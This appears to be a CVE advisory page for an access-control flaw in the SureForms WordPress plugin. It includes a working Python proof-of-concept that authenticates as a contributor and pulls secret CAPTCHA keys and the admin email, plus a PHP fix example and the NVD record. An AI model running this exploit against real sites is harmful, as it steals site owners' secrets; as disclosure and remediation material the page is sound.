Security Vulnerability Report
CVE-2025-10732 CVSS 4.3 MEDIUM

CVE-2025-10732

Published: 2025-10-14 06:15:34
Last Modified: 2026-04-15 00:35:42

Description

The SureForms – Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 1.12.1. This is due to improper access control implementation on the '/wp-json/sureforms/v1/srfm-global-settings' REST API endpoint. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve sensitive information including API keys for Google reCAPTCHA, Cloudflare Turnstile, hCaptcha, admin email addresses, and security-related form settings.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SureForms <= 1.12.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10732 Proof of Concept
# Vulnerability: Sensitive Information Disclosure in SureForms WordPress Plugin
# Affected versions: <= 1.12.1
import re
import requests

# Target WordPress site URL
target_url = "https://target-wordpress-site.com"

# REST API endpoint with improper access control
endpoint = f"{target_url}/wp-json/sureforms/v1/srfm-global-settings"

# Attacker credentials (contributor-level access or above)
username = "contributor_user"
password = "attacker_password"

# Step 1: Authenticate to WordPress and obtain session cookie
session = requests.Session()

# WordPress login endpoint
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": f"{target_url}/wp-admin/",
    "testcookie": "1",
}

# Perform login
session.post(login_url, data=login_data, cookies={"wordpress_logged_in_test": "test"})

# Step 2: Obtain WordPress nonce for REST API authentication
# Method 1: Extract nonce from the WordPress admin page
admin_page = session.get(f"{target_url}/wp-admin/")

# Look for the REST API nonce in the page source
nonce_match = re.search(r'"nonce":"([a-f0-9]+)"', admin_page.text)
if nonce_match:
    nonce = nonce_match.group(1)
    headers = {
        "X-WP-Nonce": nonce,
        "Content-Type": "application/json",
    }
else:
    # Method 2: Try without nonce (may work if authentication cookie is sufficient)
    headers = {
        "Content-Type": "application/json",
    }

# Step 3: Exploit the vulnerable endpoint to retrieve sensitive information
print(f"[*] Accessing vulnerable endpoint: {endpoint}")
response = session.get(endpoint, headers=headers)

if response.status_code == 200:
    print("[+] Successfully retrieved sensitive information!")
    sensitive_data = response.json()

    # Display exfiltrated sensitive information
    print("\n[+] Exfiltrated Data:")
    if "google_recaptcha" in str(sensitive_data):
        print(f"    Google reCAPTCHA Site Key: {sensitive_data.get('google_recaptcha_site_key', 'N/A')}")
        print(f"    Google reCAPTCHA Secret Key: {sensitive_data.get('google_recaptcha_secret_key', 'N/A')}")
    if "cloudflare_turnstile" in str(sensitive_data):
        print(f"    Cloudflare Turnstile Site Key: {sensitive_data.get('cloudflare_turnstile_site_key', 'N/A')}")
        print(f"    Cloudflare Turnstile Secret Key: {sensitive_data.get('cloudflare_turnstile_secret_key', 'N/A')}")
    if "hcaptcha" in str(sensitive_data):
        print(f"    hCaptcha Site Key: {sensitive_data.get('hcaptcha_site_key', 'N/A')}")
        print(f"    hCaptcha Secret Key: {sensitive_data.get('hcaptcha_secret_key', 'N/A')}")
    if "admin_email" in str(sensitive_data):
        print(f"    Admin Email: {sensitive_data.get('admin_email', 'N/A')}")

    print(f"\n[+] Full Response:\n{response.text}")
else:
    print(f"[-] Failed to retrieve data. Status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Alternative: Using curl command
print("\n[*] Alternative curl command:")
print(f'''curl -X GET "{endpoint}" \\
    -H "Cookie: wordpress_logged_in_xxx=YOUR_SESSION_COOKIE" \\
    -H "X-WP-Nonce: YOUR_NONCE"''')
```
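As the defender-side counterpart to the PoC above, the following is an added example, not SureForms' own code and not taken from the referenced global-settings.php: it shows the CWE-862 pattern on a WordPress REST route (a permission callback that admits any logged-in user) next to the capability check that closes it, and keeps secret keys out of the response entirely. The route path matches the advisory; the option name, settings key names and function names are assumptions made for the illustration.

```php
<?php
// Added example (not SureForms code): missing authorization on a WordPress
// REST route, and the fix. Option name and key names are assumptions.

const SRFM_EXAMPLE_SECRET_KEYS = [
    'google_recaptcha_secret_key',
    'cloudflare_turnstile_secret_key',
    'hcaptcha_secret_key',
];

// Vulnerable pattern: every authenticated user passes, so a contributor can
// read the settings. Do not register the route with a callback like this
// (nor with '__return_true', which also admits unauthenticated callers).
function srfm_example_permission_vulnerable() {
    return is_user_logged_in();
}

// Fixed pattern: require the capability an administrator needs to manage the
// plugin. WordPress answers 401/403 itself when this returns false.
function srfm_example_permission_fixed() {
    return current_user_can( 'manage_options' );
}

// Reads the stored settings for the admin UI. Secret keys are masked before
// the response leaves the server: the UI only needs to know whether a secret
// is set, not its value, so even an admin session never receives it.
function srfm_example_get_settings( WP_REST_Request $request ) {
    $settings = (array) get_option( 'srfm_example_global_settings', [] );
    foreach ( SRFM_EXAMPLE_SECRET_KEYS as $key ) {
        if ( isset( $settings[ $key ] ) && '' !== $settings[ $key ] ) {
            $settings[ $key ] = '********';
        }
    }
    return rest_ensure_response( $settings );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'sureforms/v1', '/srfm-global-settings', [
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'srfm_example_get_settings',
        // The permission callback is the access-control boundary: it must
        // name a capability, not merely check that the caller is logged in.
        'permission_callback' => 'srfm_example_permission_fixed',
    ] );
} );
```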

References

- https://plugins.trac.wordpress.org/browser/sureforms/tags/1.12.0/inc/global-settings/global-settings.php#L314
- https://plugins.trac.wordpress.org/browser/sureforms/tags/1.12.0/inc/global-settings/global-settings.php#L64
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3368400%40sureforms&new=3368400%40sureforms&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f30ae90a-54fb-4c55-a6ed-9c411a6997fb?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10732",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T06:15:33.940",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The SureForms – Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 1.12.1. This is due to improper access control implementation on the '/wp-json/sureforms/v1/srfm-global-settings' REST API endpoint. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve sensitive information including API keys for Google reCAPTCHA, Cloudflare Turnstile, hCaptcha, admin email addresses, and security-related form settings."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/sureforms/tags/1.12.0/inc/global-settings/global-settings.php#L314",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/sureforms/tags/1.12.0/inc/global-settings/global-settings.php#L64",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3368400%40sureforms&new=3368400%40sureforms&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f30ae90a-54fb-4c55-a6ed-9c411a6997fb?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```